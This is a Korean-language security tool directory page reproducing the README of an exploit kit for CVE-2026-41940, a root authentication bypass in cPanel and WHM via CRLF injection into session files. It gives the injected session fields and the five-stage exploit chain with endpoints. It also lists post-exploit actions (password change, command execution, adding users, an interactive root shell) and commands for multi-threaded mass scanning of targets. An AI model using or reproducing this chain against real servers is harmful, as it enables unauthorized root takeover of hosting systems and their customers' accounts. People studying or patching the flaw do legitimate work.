Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Automated-scanner-CVE-2026-41940 — CVE-2026-41940 — 세션 파일 CRLF 인젝션을 통한 cPanel 및 WHM 루트 인증 우회를 위한 자동화 스캐너 및 포스트 익스플로잇 툴킷 | Kitploit
도구/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
Authentication & AuthorizationReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Command and Control
Red Teaming
Payload Development
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

CVE-2026-41940 — 세션 파일 CRLF 인젝션을 통한 cPanel 및 WHM 루트 인증 우회를 위한 자동화 스캐너 및 포스트 익스플로잇 툴킷

저장소 보기
1174개월 전아직 검토되지 않음

CPANEL CVE EXPLOIT

영어 | فارسی (페르시아어)

 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

CVE-2026-41940용 자동화 스캐너 및 포스트 익스플로잇 도구 키트 — 세션 파일 CRLF 주입을 통한 cPanel 및 WHM 루트 인증 우회.


목차

  • 개요
  • CVE 세부 정보
  • 작동 방식
  • 기능
  • 영향을 받는 버전
  • 요구 사항
  • 설치
  • 빠른 시작
  • 사용법
  • 포스트 익스플로잇 작업
  • 대화형 WHM 셸
  • 대량 스캔 및 파이프라인 통합
  • Shodan Dorks
  • 출력 형식
  • 예제 세션
  • 법적 고지

개요

CPANEL CVE EXPLOIT는 CVE-2026-41940에 취약한 cPanel 및 WHM 서버에 대한 승인된 보안 평가를 위해 설계된 단일 파일 Python 도구입니다.

이 취약점을 통해 인증되지 않은 원격 공격자는 Authorization: Basic 헤더의 CRLF 주입으로 WHM 세션 파일을 오염시켜 인증을 우회하고 유효한 자격 증명 없이 루트 수준의 WHM 액세스를 획득할 수 있습니다.

속성값
CVECVE-2026-41940
심각도치명적(Critical)
CVSS10.0
공격 경로네트워크 / 인증 없음
영향전체 WHM 루트 액세스
기본 포트2087 (WHM)
상태실제 환경 악용 확인됨 (2026년 4월)

CVE 세부 정보

근본 원인

취약한 버전의 cPanel 및 WHM에서 Session.pm의 saveSession()은 세션 파일을 디스크에 기록한 후에 filter_sessiondata()를 호출합니다. 공격자는 HTTP Authorization: Basic 헤더를 통해 CRLF(\r\n) 문자를 주입할 수 있으며, 이는 삭제 절차를 우회하여 디스크의 세션 파일에 직접 기록됩니다.

주입된 세션 필드

이 도구는 다음으로 디코딩되는 Base64 인코딩 페이로드를 사용합니다:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

이 필드들은 2FA 우회(tfa_verified=1) 및 루트 권한 플래그(hasroot=1)를 포함하여 완전히 인증된 루트 WHM 세션을 시뮬레이션합니다.

패치

cPanel은 Session.pm에서 filter_sessiondata()가 세션 쓰기 작업 이전에 실행되도록 변경했습니다.


작동 방식

익스플로잇 체인은 5단계(Stage 0–4)로 구성됩니다:

flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]
단계엔드포인트목적
0/openid_connect/cpanelid307 리디렉션을 통해 정식 호스트 이름 자동 발견
1/login/?login_only=1잘못된 자격 증명으로 사전 인증 whostmgrsession 쿠키 획득
2/CRLF로 오염된 Authorization: Basic 헤더를 세션 파일에 주입
3/scripts2/listacctsdo_token_denied 가젯을 트리거하여 세션을 캐시로 플러시
4/{token}/json-api/version루트 액세스 확인 — HTTP 200 + 버전 JSON

기능

기능설명
단일 대상 스캔단일 WHM URL에 대한 전체 익스플로잇 체인
대량 스캔파일 또는 stdin에서 다중 스레드 스캔
버전 감지패치/취약 버전 자동 비교
포스트 익스플로잇 API비밀번호 변경, 명령 실행, 계정 목록, 사용자 생성
대화형 셸파일 읽기 및 API 명령을 지원하는 내장 WHM 루트 셸
Selenium 로그인Chrome/Firefox에 세션 쿠키 자동 주입
수동 브라우저 대체수동 WHM 로그인을 위한 콘솔 JavaScript 스니펫
RCE 확인우회 후 빠른 id / uname -a 검증
JSON 내보내기모든 결과를 구조화된 JSON 보고서로 저장
파이프라인 지원httpx, subfinder, shodan, awk 파이프라인과 호환
표준 라이브러리 전용핵심 기능에 pip 의존성 불필요
색상화 출력심각도 표시기를 포함한 실시간 단계 로깅

영향을 받는 버전

브랜치패치 버전상태
11.110.x11.110.0.97패치 미만 버전 취약
11.118.x11.118.0.63패치 미만 버전 취약
11.126.x11.126.0.54패치 미만 버전 취약
11.132.x11.132.0.29패치 미만 버전 취약
11.134.x11.134.0.20패치 미만 버전 취약
11.136.x11.136.0.5패치 미만 버전 취약

참고: 패치된 빌드를 실행 중인 대상은 스캔 중 자동으로 표시되어 건너뜁니다.


요구 사항

핵심 (필수)

  • Python 3.8+
  • 외부 패키지 없음 — Python 표준 라이브러리만 사용

선택 사항

패키지용도
selenium브라우저 자동 로그인 (--selenium)
Chrome / FirefoxSelenium용 브라우저 엔진
pip install -r requirements.txt   # optional — selenium only

설치

git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

빌드 단계가 필요 없습니다. 바로 실행하세요:

python3 test-cve.py --help

빠른 시작

# Scan a single WHM target
python3 test-cve.py -u https://target.com:2087

# Scan with post-exploit: list all cPanel accounts
python3 test-cve.py -u https://target.com:2087 --action list

# Mass scan from file, 20 threads, save JSON report
python3 test-cve.py -l targets.txt -t 20 -o results.json

사용법

usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

대상 옵션

플래그설명
-u, --url단일 대상 URL (예: https://host:2087)
-l, --listURL이 한 줄에 하나씩 포함된 파일
--hostname정식 Host 헤더 재정의 (기본값: 자동 발견)

스캔 옵션

플래그기본값설명
-t, --threads10동시 스캔 스레드 수
--timeout15HTTP 타임아웃(초)
--rate-limit0대상 제출 간 지연(초)

출력 옵션

플래그설명
-o, --output결과를 JSON 파일로 저장
--no-colorANSI 색상 출력 비활성화

포스트 익스플로잇 작업

포스트 익스플로잇 플래그는 단일 대상에서만 작동합니다(-u, 대량 스캔 아님).

도구 다운로드